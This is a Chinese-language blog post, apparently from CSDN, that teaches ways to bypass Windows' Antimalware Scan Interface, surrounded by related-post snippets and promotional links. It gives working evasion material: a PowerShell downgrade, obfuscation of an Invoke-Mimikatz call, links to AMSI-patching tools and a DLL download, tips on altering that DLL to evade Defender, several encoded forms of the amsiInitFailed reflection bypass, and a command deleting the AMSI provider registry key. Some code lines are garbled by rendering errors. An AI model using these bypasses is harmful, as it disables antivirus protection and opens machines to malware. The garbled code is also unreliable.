针对 AMSI 的绕过技术

于 2023-02-09 20:49:49 发布
阅读量382 收藏 4
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71745258/article/details/128960381
版权

什么是AMSI?

Antimalware Scan Interface(AMSI)译为反恶意软件扫描接口,它是一种防御机制,用于检查 PowerShell、UAC
等是否有恶意数据传入。它主要针对在 PowerShell 或其他 AMSI 集成环境中执行的命令和脚本。如果检测到任何恶意内容,AMSI
将停止执行并将其发送至 Windows Defender 进一步分析。

目前防病毒软件更新迭代速度较快,具有许多发现恶意软件和威胁的检测机制。但是,当防病毒软件无法检查完全依赖于内存且不落在磁盘上的文件内容时,对 AMSI
的需求就会增加。防病毒软件会对磁盘上的文件和试图创建进程的文件执行检测。但是,如果攻击者试图通过命令或恶意无文件脚本执行在内存中加载运行时,AMSI
就会对命令或无文件脚本中的恶意内容进行检测。

1669084236_637c344c1d2163199c6aa.jpg!small?1669084235498

与 AMSI 集成的 Windows 组件有:

  1. 用户帐户控制(EXE、COM、MSI 或 ActiveX 安装更新)
  2. PowerShell(脚本、交互式使用和动态代码调试)
  3. Windows 脚本(wscript.exe 和 cscript.exe)
  4. JavaScript 和 VBScript
  5. Office VBA 宏1669084262_637c3466550055b2e8b9c.jpg!small?1669084261383

它是怎么工作的?

当用户启动 PowerShell(或 PowerShell_ISE)进程或脚本时,库会自动加载到该进程中。该库提供了与防病毒软件交互所需的
API。在执行之前,使用远程过程调用 (RPC) 将脚本或命令发送到 Microsoft Defender,然后Microsoft Defender
会分析收到的信息并将响应发送回去。如果检测到已知签名,则会停止执行并显示一条消息,表明该脚本已被防病毒程序阻止。

如何绕过检查?

1.PowerShell降级

如果运行 Powershell 的 payload 时被AMSI拦截 ,可以将 PowerShell 版本降级到 2.0,因为 AMSI 仅支持 v2.0
之后的版本。

首先,可以看到我们的关键字被amsi屏蔽了。

1669084300_637c348c1b0655fc5ff6a.jpg!small?1669084299043

然后降级到版本2并再次运行被拦截的命令

powershell -version 2

“amsiutils”

1669084328_637c34a8d0bed929d80e4.jpg!small?1669084327769

但这里最大的缺点是许多函数或脚本无法在 PowerShell 2.0 上运行。所以,可以尝试其他方法。

2.混淆

AMSI 根据某些关键字检测签名,所以对这些关键字进行混淆处理是可以绕过的。

例如,混淆 invoke-mimikatz 命令

Invoke-Mimikatz

“Inv”+“o”+“ke”+“-Mimi”+“katz”

1669084353_637c34c14db6334627f63.jpg!small?1669084352370

将字符串拆分开,然后通过“+”号连接起来,就可以绕过 AMSI。

然而,这种技术有其自身的缺点。payload可能会触发一次或多次
AMSI,所以在每次运行payload后都需要排查逐个关键字,此种方法非常耗时且会产生较多的攻击流量。

这里也可以尝试通过https://amsi.fail来混淆代码。

3.内存劫持

Daniel Duggan 在他的博客中发表了关于可以绕过 AMSI 的[内存劫持](https://rastamouse.me/memory-
patching-amsi-bypass/)[技术](https://rastamouse.me/memory-patching-amsi-
bypass/)的文章。逻辑是通过 Hook 函数 AmsiScanBuffer() ,让它始终返回句柄AMSI_RESULT_CLEAN,达到欺骗
AMSI 没有发现恶意软件的效果。

以下是一些利用工具:

https://github.com/rasta-mouse/AmsiScanBufferBypass

https://gist.github.com/FatRodzianko/c8a76537b5a87b850c7d158728717998

https://gist.github.com/am0nsec/986db36000d82b39c73218facc557628

https://gist.github.com/am0nsec/854a6662f9df165789c8ed2b556e9597

https://github.com/med0x2e/NoAmci

首先,运行 Invoke-Mimikatz 命令,看看 AMSI 是否正常工作。

1669084394_637c34ea08893ec8052c1.jpg!small?1669084392959

上面的链接是原始代码,也可以直接访问下面的链接进行下载。

https://github.com/rasta-mouse/AmsiScanBufferBypass

https://github.com/harshitrajpal/AmsiScanBufferBypass/releases/download/publish/ASBBypass.dll

下载后,需将dll的名称“AmsiScanBufferBypass”改为“Project”或任意名称,因为 AMSI
会识别并拦截字符串“AmsiScanBufferBypass”!

运行以下命令即可绕过:

1669084420_637c35043cd0817ce62bb.jpg!small?1669084419250

Tips:

关于ASBBypass.dll 如何绕过Windows Defender,我这里选择了Virtest跑一遍特征码,之后直接修改绕过。

1669084466_637c35323ab3aa7dbbc68.jpg!small?1669084465239

修改几个数值后即可绕过检测了

1669084483_637c354339e2e7ed73dcf.jpg!small?1669084483185

1669084494_637c354e6d31b724b84b7.jpg!small?1669084493654

4.Base64编码

对运行时触发 AMSI 的字符串(AmsiUtils和amsiInitFailed)使用base64编码,可以用来逃避关键字检测。

通过设置 “amsiInitFailed” 函数值为true来阻止当前进程的AMSI扫描功能。

原始AMSI Bypass

[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,‘NonPublic,Static’).SetValue( n u l l , null, null,true)

Base64编码

[Ref].Assembly.GetType(‘System.Management.Automation.’+ ( [ T e x t . E n c o d i n g ] : : U n i c o d e . G e t S t r i n g ( [ C o n v e r t ] : : F r o m B a s e 64 S t r i n g ( ′ Q Q B t A H M A a Q B V A H Q A a Q B s A H M A ′ ) ) ) ) . G e t F i e l d ( ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField( ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(QQBtAHMAaQBVAHQAaQBsAHMA)))).GetField(([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(‘YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA==’))),‘NonPublic,Static’).SetValue( n u l l , null, null,true)

1669084530_637c357252b5c8a530665.jpg!small?1669084529758

拆分混淆变形

w = ′ S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A ′ ; w = 'System.Management.Automation.A'; w=System.Management.Automation.A;c = ‘si’;$m = ‘Utils’

$assembly = [Ref].Assembly.GetType((‘{0}m{1}{2}’ -f w , w, w,c,$m))

$field = $assembly.GetField((‘am{0}InitFailed’ -f $c),‘NonPublic,Static’)

f i e l d . S e t V a l u e ( field.SetValue( field.SetValue(null,$true)

1669084543_637c357fe44f32854f36d.jpg!small?1669084543047

Hex编码

[Ref].Assembly.GetType(‘System.Management.Automation.’+KaTeX parse error: Expected '}', got 'EOF' at end of input: …vert]::toint16(,16))}|forEach{ r e s u l t = result= result=result+KaTeX parse error: Expected group after '_' at position 1: _̲};result)).GetField(KaTeX parse error: Expected '}', got 'EOF' at end of input: …vert]::toint16(,16))}|forEach{ r e s u l t 2 = result2= result2=result2+KaTeX parse error: Expected group after '_' at position 1: _̲};result2),‘NonPublic,Static’).SetValue( n u l l , null, null,true)

1669084557_637c358d364b8eb8585a4.jpg!small?1669084556135

5.删除 AMSI 注册表项

通过管理员权限,攻击者可以删除 HKLM\Software\Microsoft\AMSI 中的 AMSI Provider 注册表项以禁用 AMSI 。

使用以下命令将删除 AMSI注册表项。

Remove-Item -Path
“HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}”
-Recurse

1669084586_637c35aadb62db859f02f.jpg!small?1669084585987

恢复命令:

New-Item -Path “HKLM:\SOFTWARE\Microsoft\AMSI\Providers” -Name
“{2781761E-28E0-4109-99FE-B9D127C57AFE}” -ErrorAction Ignore | Out-Null

1669084602_637c35ba65d9f57c48cdb.jpg!small?1669084601313

结论

上面的例子演示了部分绕过 AMSI 的方法,即使 AMSI 加强了对 Windows 10 和 Windows Server 系统的保护,
Microsoft Defender 也提供了一些针对 AMSI
绕过的保护,但攻击者仍在不断尝试新的方法来隐藏恶意内容以防止被检测。谨以此文作为广大技术爱好者参考,力争能在此领域的对抗有所突破。

最后

网络安全工程师企业级学习路线

如图片过大被平台压缩导致看不清的话,扫码下方二维码CSDN大礼包:《黑客&网络安全入门&进阶学习资源包免费分享


视频配套资料&国内外网安书籍、文档&工具
当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
在这里插入图片描述
​​
一些我自己买的、其他平台白嫖不到的视频教程:

如图片过大被平台压缩导致看不清的话,扫码下方二维码CSDN大礼包:《黑客&网络安全入门&进阶学习资源包免费分享

飞天小牛仔
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
绕过AMSI实现免杀的研究和思路
qq_42766267的博客
11-11 3667
何为AMSI Antimalware Scan Interface(AMSI)为反恶意软件扫描接口。 微软对他产生的目的做出来描述: Windows 反恶意软件扫描接口 (AMSI) 是一种通用接口标准,允许您的应用程序和服务与机器上存在的任何反恶意软件产品集成。AMSI 为您的最终用户及其数据、应用程序和工作负载提供增强的恶意软件保护。AMSI 与反恶意软件供应商无关;它旨在支持当今可以集成到应用程序中的反恶意软件产品提供的最常见的恶意软件扫描和保护技术。它支持允许文件和内存或流扫描、内容源 UR
AMSI对抗小结
wo41ge的博客
11-11 1万+
前言 AMSI是微软用来对抗无文件攻击而开发的安全模块,是当前攻防对抗前沿的技术 之一 从15年AMSI出现,越来越多的杀软厂商接入了AMSI接口,当前市面上主流杀软均接入此接口 这给当时以powershell为主的红队工具致命打击,像Empire,等等 总体来说,由于AMSI仅仅是一个连接应用程序和杀软程序的通道,微软主要还是在defender上做各种对抗,针对通道本身的加固较少。 红队工具也寻找了另外一条出路就是.Net,使用C#开发的红队工具随之兴起。 随着以.NET(C#)为基础的攻击技术的逐渐成熟
base64的天坑
debugeeker的专栏
03-30 168
base64编码补位的坑,导致数据验证被绕过,也绕过了系统黑名单的检测。 背景 突然,测试人员找上我,说篡改某对象ID的值会绕过系统的黑名单检测! 我非常不相信,因为该对象ID生成有随机因素,而且它的校验也有hash判断,只要校验不通过,立马会拒绝。 他把那个对象ID发给我,是这样的 NWE3MGQzMTBhYWYyODUxZTFlN2QwOWY2OWFmOGE5ZjMtMmUzOGIxZWNlZTVkNDUzNjkyYTg2NDAxYTVhZjk0MzUwMDAyLUx3QTF1OGpXW.
AV/EDR 免杀逃避技术汇总
jentle8的博客
09-08 1834
EDR AV 逃避和免杀方案汇总
memset 线程安全_恶意.NET安全攻防(一):使用ETW隐藏你的.NET
weixin_35748962的博客
12-19 248
前言随着目前的防御机制不断加强对于PowerShell的检测功能,攻击者也不断改变他们所使用的战术,并逐渐改用到很少会被监测到的技术,.NET就是其中的一种。随着时间的推移,很多攻击者已经习惯了可以用于后漏洞利用的大量.NET Payload。诸如GhostPack和SharpHound这样的工具套件,已经成为攻击者武器库中的一部分,负责为其提供“动力”的框架,通常会是Cobalt S...
Amsi-Bypass-Powershell:此仓库包含一些我在不同博客文章中发现的Amsi绕过方法
05-06
Amsi绕过Powershell 此回购包含一些我在不同博客文章中发现的一些反恶意软件扫描接口(AMSI绕过/避免方法。 大多数脚本由AMSI本身检测。 因此,您必须在运行时通过变量/函数重命名,字符串替换或编码和解码来...
AmsiHook是我创建的一个项目,旨在通过功能挂钩找出对AMSI绕过。-C/C++开发
05-27
AmsiHook是我创建的一个项目,旨在通过功能挂钩找出对AMSI绕过AmsiHook AmsiHook是一个DLL,当注入包含AMSI日志记录的进程时,它将钩住AMSI函数并允许它们使用伪参数执行。 注释我编写了与该工具配合使用的注射...
NoAmci:使用DInvoke修补AMSI.dll,以绕过通过Assembly.Load()加载.NET tradecraft时触发的AMSI检测。
03-20
一个PoC,用于使用DInvoke修补AMSI.dll,以绕过通过Assembly.Load()加载.NET tradecraft时触发的AMSI检测。可以压缩.Net tradecraft进行编码,编码(如果需要,可以加密),以使程序集大小小于1MB,然后将其嵌入为...
amsi.dll
11-21
amsi
如何绕过AMSI
systemino的博客
06-16 1955
0x00 前言 AMSI的全称是反恶意软件扫描接口(Anti-Malware Scan Interface),是从Windows 10开始引入的一种机制。AMSI是应用程序和服务能够使用的一种接口,程序和服务可以将“数据”发送到安装在系统上的反恶意软件服务(如Windows Defender)。 在基于场景的资产评估或者基于数据的红队评估中,许多渗透测试人员都会与AMSI打交道,因此...
NetLoader:加载mem中的任何C#二进制文件,修补AMSI + ETW
03-20
网络加载器 从文件路径或URL加载任何C#二进制文件,修补AMSI并在运行时绕过Windows Defender 我不再为此项目提供签名更新 寻找要部署的二进制文件/有效载荷吗?结帐 !。 SharpCollection包含每晚生成的C#攻击性工具,这些工具从使用Azure DevOps发布管道以CDI方式构建和发布的各自的主分支中提取。 编译 c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:RandomName.exe Program.cs 通过LOLBin(MSBuild)进行部署 MSBuild的有效负载位于/ LOLBins文件夹中,也可能会将其推入其他LOLBins中。使用MSBuild部署NetLoader时,必须将参数添加到底部XML文件中 Adding arguments to the XM
基于脚本的攻击或可绕过微软的反恶意软件扫描接口(AMSI
SAKAISON的博客
09-23 2338
写在前面的话 上个月,我在2016美国Black Hat黑客大会上讨论了一些关于微软反恶意软件扫描接口(AMSI)的内容。那场演讲和这篇文章中的内容是我对AMSI的一些个人见解,感兴趣的同学可以关注一下。 演讲PPT:[地址1][地址2] 在Windows 10中,微软公司引入了反恶意软件扫描接口(AMSI),这个接口可以用来扫描基于脚本的入侵攻击
恶意.NET安全攻防(一):使用ETW隐藏你的.NET
systemino的博客
05-14 1058
言 随着目前的防御机制不断加强对于PowerShell的检测功能,攻击者也不断改变他们所使用的战术,并逐渐改用到很少会被监测到的技术,.NET就是其中的一种。随着时间的推移,很多攻击者已经习惯了可以用于后漏洞利用的大量.NET Payload。诸如GhostPack和SharpHound这样的工具套件,已经成为攻击者武器库中的一部分,负责为其提供“动力”的框架,通常会是Cobalt Strike的execute-assembly。 这样的功能,有效减少了红队的工作量。在我看来,这也正是.NET工具持
宏病毒的研究与实例分析04——实战分析
热门推荐
鬼手的博客
03-11 2万+
文章目录样本1-powershell_downloader样本2-严重混淆样本3-行为监控最后说明 本章我们将分析几个有趣的宏病毒,一窥宏病毒分析技巧。本章所有样本均存在恶意行为,请在虚拟机中运行。 样本1-powershell_downloader 首先使用oledump.py提取宏: 提取到的宏代码如下: Attribute VB_Name = "Module1" Sub Auto_Open...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8232
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于matlab实现人工免疫算法的解决TSP问题的方法
最新发布
05-21
基于matlab实现人工免疫算法的解决TSP问题的方法,体现了免疫算法在进化计算过程中的抗原学习、记忆机制、浓度调节机制以及多样性抗体保持策略等优良特性.rar
麦肯锡图表绘制培训.pptx
05-21
麦肯锡图表绘制培训.pptx
Java_Android的自由轻量级流媒体前端.zip
05-21
Java_Android的自由轻量级流媒体前端
node-v18.20.2-linux-arm64
05-21
node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64 node-v18.20.2-linux-arm64node-v18.20.2-linux-arm64
amesim怎么做python接口
04-29
AMESim是一个用于系统级建模和仿真的工具,它可以用于模拟各种不同的物理系统。如果你想在Python中使用AMESim模型,可以通过以下步骤来创建AMESim的Python接口: 1. 安装AMSI Python API:AMSIM提供了一个Python API,可以通过pip安装。在命令行中运行以下命令即可: ``` pip install amsi ``` 2. 加载AMESim模型:使用Python API,可以加载已经建立的AMESim模型。在Python脚本中,可以使用以下命令来加载AMESim模型: ``` import amsi amsim_model = amsi.AMSIMModel('path_to_amesim_model') ``` 其中,'path_to_amesim_model'是AMESim模型文件的路径。 3. 运行AMESim模型:加载模型后,可以使用以下命令来运行AMESim模型: ``` amsim_model.run() ``` 4. 访问AMESim结果:在模型运行完成后,可以使用以下命令来访问AMESim的结果: ``` result = amsim_model.get_result() ``` 这样,就可以在Python中使用AMESim模型,并且访问模型的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值